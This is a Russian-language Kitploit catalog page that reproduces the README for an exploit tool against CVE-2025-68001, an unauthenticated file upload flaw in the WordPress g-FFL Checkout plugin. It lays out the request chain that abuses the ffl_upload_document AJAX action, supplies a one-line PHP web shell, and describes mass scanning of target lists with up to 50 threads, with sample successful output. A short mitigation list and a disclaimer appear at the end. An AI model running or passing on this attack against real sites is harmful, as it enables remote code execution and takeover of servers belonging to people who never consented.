Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/nxploited/cve-2025-68001
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubnxploited/cve-2025-68001

CVE-2025-68001

Плагин WordPress g-FFL Checkout Plugin версии <= 2.1.0 уязвим к произвольной загрузке файлов с высоким приоритетом.

Репозиторий
14 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-68001

WordPress плагин g-FFL Checkout <= 2.1.0 уязвим к загрузке произвольных файлов с высоким приоритетом

root@kitploit:~
  _      _   _   _  _   _     _   _   _   _    
 / \  / |_ __ ) / \  ) |_ __ |_  (_) / \ / \ /|
 \_ \/  |_   /_ \_/ /_  _)   |_) (_) \_/ \_/  |
                                                 

Telegram CVE Python License


📡 Опережайте события. Присоединяйтесь к @KNxploited в Telegram — ваш эксклюзивный источник последних CVE, zero-day и передовых исследований эксплойтов. Обновляется постоянно. Не для всех.


📋 Обзор

CVE-2025-68001 — это критическая уязвимость Неаутентифицированная загрузка произвольных файлов, обнаруженная в плагине g-FFL Checkout для WordPress от garidium.

Уязвимость позволяет неаутентифицированному удаленному злоумышленнику загружать произвольные файлы, включая веб-шеллы, на целевой сервер через AJAX-действие ffl_upload_document, что приводит к полному удаленному выполнению кода (RCE).

ПолеПодробности
CVE IDCVE-2025-68001
Плагинg-FFL Checkout (g-ffl-checkout)
Затронутые версииn/a до <= 2.1.0
Тип уязвимостиНеограниченная загрузка файлов
ВоздействиеУдаленное выполнение кода (RCE)
АутентификацияНе требуется
Серьезность CVSSКритический
ИсследовательNxploited

⚙️ Как это работает

Эксплойт следует точной многошаговой цепочке атак:

root@kitploit:~
1. GET /checkout
      ↓
   Извлечение `checkout_nonce` из встроенного JavaScript

2. POST /wp-admin/admin-ajax.php
      action=ffl_upload_document
      nonce=<извлеченный_nonce>
      document_type=document
      document=<shell.php, замаскированный под image/png>
      ↓
   Сервер сохраняет файл без проверки расширения или MIME

3. Разбор JSON-ответа
      ↓
   Извлечение пути загруженного файла / уникального имени

4. Доступ к загруженному шеллу через HTTP
      ↓
   Удаленное выполнение кода достигнуто ✔️

Плагин предоставляет AJAX-эндпоинт ffl_upload_document, который:

  • Принимает загрузку файлов без проверки аутентификации
  • Не выполняет проверку типа файла на стороне сервера
  • Возвращает путь к сохраненному файлу в своем JSON-ответе

🔧 Требования

Установите все зависимости перед запуском:

root@kitploit:~
pip install requests rich
ЗависимостьНазначение
requestsHTTP-запросы и управление сессией
richТерминальный UI, индикаторы, панели
threadingМногопоточная обработка целей

Требуется Python 3.8+.


📂 Структура файлов

root@kitploit:~
CVE-2025-68001/
├── CVE-2025-68001.py       # Основной скрипт эксплойта
├── shell.php               # Веб-шелл для загрузки (вы предоставляете)
├── list.txt                # URL-адреса целей (по одному на строку)
└── success_results.txt     # Автоматически создаваемый файл с результатами

🚀 Использование

Шаг 1 — Подготовьте цели

Создайте файл list.txt с одним URL цели на строку:

root@kitploit:~
https://target1.com
https://target2.com
http://target3.com/wordpress

Скрипт автоматически добавляет http://, если схема не указана.


Шаг 2 — Подготовьте шелл

Поместите ваш PHP веб-шелл в ту же директорию. Пример минимального шелла:

root@kitploit:~
<?php system($_GET['cmd']); ?>

Сохраните его как shell.php (или любое другое имя — вам будет предложено его ввести).


Шаг 3 — Запустите эксплойт

root@kitploit:~
python CVE-2025-68001.py

Вас встретят интерактивные запросы:

root@kitploit:~
Enter targets file name (default: list.txt):
> list.txt

Enter shell file name to upload (default: shell.php):
> shell.php

Enter number of threads (default: 50):
> 20

Шаг 4 — Просмотрите результаты

Успешные эксплойты автоматически сохраняются в success_results.txt:

root@kitploit:~
https://target.com | /wp-content/uploads/ffl/abc123.php | abc123.php | shell.php

Каждая строка содержит:

  • URL цели
  • Путь к сохраненному файлу на сервере
  • Уникальное имя файла, присвоенное сервером
  • Исходное имя загруженного файла

🖥️ Справка по параметрам скрипта

ЗапросПо умолчаниюОписание
Файл с целямиlist.txtФайл, содержащий URL целей
Файл шеллаshell.phpPHP-шелл для загрузки на цель
Количество потоков50Параллельные рабочие (макс: 50)

📊 Пример вывода

root@kitploit:~
✔  https://victim.com  — /checkout reachable. Trying exploit...

┌─────────────────────────────────────────────────────┐
│                      Success                        │
│  https://victim.com                                 │
│  Original Name:  shell.php                          │
│  Unique Name:    a7f3c1d9e.php                      │
│  Stored Path:    /wp-content/uploads/ffl/a7f3c1.php │
└─────────────────────────────────────────────────────┘

All targets processed ✔️. Results saved to: success_results.txt

🔍 Уязвимый код (Технические детали)

Уязвимость находится в обработчике AJAX плагина, зарегистрированном без проверки прав:

root@kitploit:~
// Нет проверки аутентификации или прав
add_action('wp_ajax_nopriv_ffl_upload_document', 'ffl_upload_document');

function ffl_upload_document() {
    // Nonce проверяется со страницы /checkout (общедоступна)
    // Нет проверки MIME-типа
    // Нет белого/черного списка расширений
    move_uploaded_file($_FILES['document']['tmp_name'], $upload_path);
    wp_send_json_success(['file_path' => $upload_path]);
}

🛡️ Смягчение и устранение

Если вы владелец сайта или разработчик, немедленно выполните следующие действия:

  • ✅ Обновите плагин g-ffl-checkout до исправленной версии (> 2.1.0), если она доступна
  • ✅ Отключите плагин, пока не будет подтверждено исправление
  • ✅ Ограничьте права на выполнение в директориях загрузки (например, правила .htaccess)
  • ✅ Реализуйте проверку типа файла на стороне сервера и строгий белый список расширений
  • ✅ Мониторьте директории загрузки на подозрительные .php файлы
  • ✅ Включите правила WAF для блокировки неаутентифицированных AJAX-запросов на загрузку файлов

⚠️ Отказ от ответственности

root@kitploit:~
ДАННЫЙ ИНСТРУМЕНТ ПРЕДОСТАВЛЯЕТСЯ ИСКЛЮЧИТЕЛЬНО ДЛЯ ОБРАЗОВАТЕЛЬНЫХ
И АВТОРИЗОВАННЫХ ИССЛЕДОВАНИЙ БЕЗОПАСНОСТИ.

Используя этот скрипт, вы явно соглашаетесь со следующим:

  • У вас есть ЯВНОЕ письменное разрешение от владельца целевой системы.
  • Вы работаете в контролируемой лаборатории или в рамках авторизованного
    пентеста.
  • Вы НЕ будете использовать этот инструмент против любой системы, которой
    вы не владеете или не имеете законного разрешения на тестирование.
  • Автор (Nxploited) НЕ несет НИКАКОЙ ответственности за любой ущерб,
    потерю данных, юридические последствия или неправомерное использование
    данного инструмента.

Несанкционированное использование этого инструмента против систем без
разрешения ЯВЛЯЕТСЯ НЕЗАКОННЫМ и может нарушать законы, включая, но не
ограничиваясь:
  — Закон о компьютерном мошенничестве и злоупотреблениях (CFAA)
  — Директиву ЕС об атаках на информационные системы
  — И аналогичные законы в вашей юрисдикции.

ИСПОЛЬЗУЙТЕ ОТВЕТСТВЕННО. ХАКАЙТЕ ЭТИЧНО.

👤 Автор

ПсевдонимNxploited
Telegram@KNxploited
GitHubgithub.com/Nxploited

🔔 Подпишитесь на @KNxploited в Telegram чтобы получать последние раскрытия уязвимостей, релизы эксплойтов и исследования безопасности — раньше всех.


Создано с точностью Nxploited · Только для образовательных целей
Скачать инструмент